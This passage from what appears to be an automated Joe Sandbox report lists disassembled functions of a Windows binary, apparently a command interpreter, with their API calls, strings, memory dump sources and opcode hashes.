                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E944720D
                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E9447300
                                                                                                                                                                          • Part of subcall function 00007FF6E9445740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6E94475C4,?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E9445744
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                        • API String ID: 455305043-1814513734
                                                                                                                                                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                        • Instruction ID: 23c0fb8a18d3f3baddcb7c7d159e0f9b9f38ad05ac0c70edcd3aa26fd27921fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                        • Instruction Fuzzy Hash: B861AF73B19A42C1EF258F6598103B963A1FF84B80F544531DA0E87795EE3EE60ACB09
                                                                                                                                                                        Function 00007FF6E9421DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                        • String ID: %s
                                                                                                                                                                        • API String ID: 2401724867-3043279178
                                                                                                                                                                        • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                                                                        • Instruction ID: 825daf9c43f2a9d7ba3b851f797017f3cec053c75ef5007fc3c7b3cec8a4f7df
                                                                                                                                                                        • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B51ADB3A08686C5EB219F21D8403F963A0FF49B94F444135DA5D8B794EF3EE459CB0A
                                                                                                                                                                        Function 00007FF6E942E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction ID: 38e1565347d210376ff9ddeae28bee47200d3431c281a82e85d4042e67bc2b76
                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 77516333A08646C5EB209F66A44837A77A0FF44B14F508435DA4DC3390EF7EE888C71A
                                                                                                                                                                        Function 00007FF6E944992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9449A10
                                                                                                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9449994
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A77A
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A839
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A850
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF6E9449A62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                        • String ID: %s=%s$.
                                                                                                                                                                        • API String ID: 3242694432-4275322459
                                                                                                                                                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                        • Instruction ID: 6bf29e67a6c7e4cb0261faf45c953c2403d55d181a270e9c59e810d5d1644003
                                                                                                                                                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                        • Instruction Fuzzy Hash: 9641C227B0C782C5EE209F61A0503B992A1BF86B90F444230DD5D977D5EE7EE44AD70A
                                                                                                                                                                        Function 00007FF6E94454B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94454E6
                                                                                                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E944552E
                                                                                                                                                                          • Part of subcall function 00007FF6E944758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94475AE
                                                                                                                                                                          • Part of subcall function 00007FF6E944758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94475C6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                        • API String ID: 779401067-630742106
                                                                                                                                                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                        • Instruction ID: f814c774e58bc8b37f60240077ed269938ac9cf1f27fa3bbcc969c17cd45021e
                                                                                                                                                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                        • Instruction Fuzzy Hash: 73516273628682C2EB159F61E4007FE6361EF84784F544031EA4DCBA55DE7ED50ECB05
                                                                                                                                                                        Function 00007FF6E943417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction ID: 82d12ce4bf942a1684c69ba2ab26bc134c6926f5cfbca28edf2385294d2a7428
                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction Fuzzy Hash: DB11E253609741C6EB2ACF71A819379B6A0EF49B99F498132DD0D87790DF3DE049C70A
                                                                                                                                                                        Function 00007FF6E94258D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                        • API String ID: 3677997916-3870813718
                                                                                                                                                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                        • Instruction ID: 2a179098f972559df3e76f6b874514237c5ca4c86bcdb1d0801a43e2f60cb95e
                                                                                                                                                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                        • Instruction Fuzzy Hash: 11110A77619A41C7EB108F50E44466ABBA4FB89764F404235DA8D83B68EF7ED048CB05
                                                                                                                                                                        Function 00007FF6E9424C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 110935159-0
                                                                                                                                                                        • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                                                                        • Instruction ID: 92069aedca4fadfed99c6b0a2a026f11962edcaf8bb5eba8e0398b81924bf236
                                                                                                                                                                        • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B518D23B19786C5FA219F6198147F96290FF49BA4F084631CE5E8B784EE3DE54AC306
                                                                                                                                                                        Function 00007FF6E9435EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction ID: b3fa9b21cb5155f41ee51955f32ccf242236cfbbf832bdeb7c7a47d0c483f8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C51A027A09682C5EB25DF3098097BA77B0FF49B58F458135CA0D87694EE3ED54CC70A
                                                                                                                                                                        Function 00007FF6E94291C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E942921C
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E94293AA
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: wcsrchr.MSVCRT ref: 00007FF6E9428BAB
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: _wcsicmp.MSVCRT ref: 00007FF6E9428BD4
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: _wcsicmp.MSVCRT ref: 00007FF6E9428BF2
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9428C16
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9428C2F
                                                                                                                                                                          • Part of subcall function 00007FF6E9428B20: wcschr.MSVCRT ref: 00007FF6E9428CB3
                                                                                                                                                                          • Part of subcall function 00007FF6E943417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E94341AD
                                                                                                                                                                          • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
                                                                                                                                                                          • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
                                                                                                                                                                          • Part of subcall function 00007FF6E9433060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
                                                                                                                                                                          • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE ref: 00007FF6E9433106
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF6E94292D8
                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9429362
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9429373
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3966000956-0
                                                                                                                                                                        • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                                                                        • Instruction ID: 36316a92a970b7a5d8276705fd1eebb791a776ba8f34d9c6deee42020b136fe4
                                                                                                                                                                        • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8051AA33A09A82C6EB618F21D9503B963A0FF49B84F148435DA4DC7B95DF3EE559C30A
                                                                                                                                                                        Function 00007FF6E9422A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_setjmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3883041866-0
                                                                                                                                                                        • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                                                                        • Instruction ID: 19f5fd1055bc18bcfa38f433dc423980298e2d5f552e22fad0962a5a83bc6376
                                                                                                                                                                        • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A515672A08B86CAEB65CF21E8503E977A4FB49748F404135EA4DCBA48DF3DD648CB05
                                                                                                                                                                        Function 00007FF6E942B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E942B4BD
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E942B518
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E942B58B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                        • String ID: ELSE$IF/?
                                                                                                                                                                        • API String ID: 3223794493-1134991328
                                                                                                                                                                        • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                        • Instruction ID: 6ee8fec59c18a01561a81e758a6a8b5a15422c8779968c98e89cf99dba3d1598
                                                                                                                                                                        • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
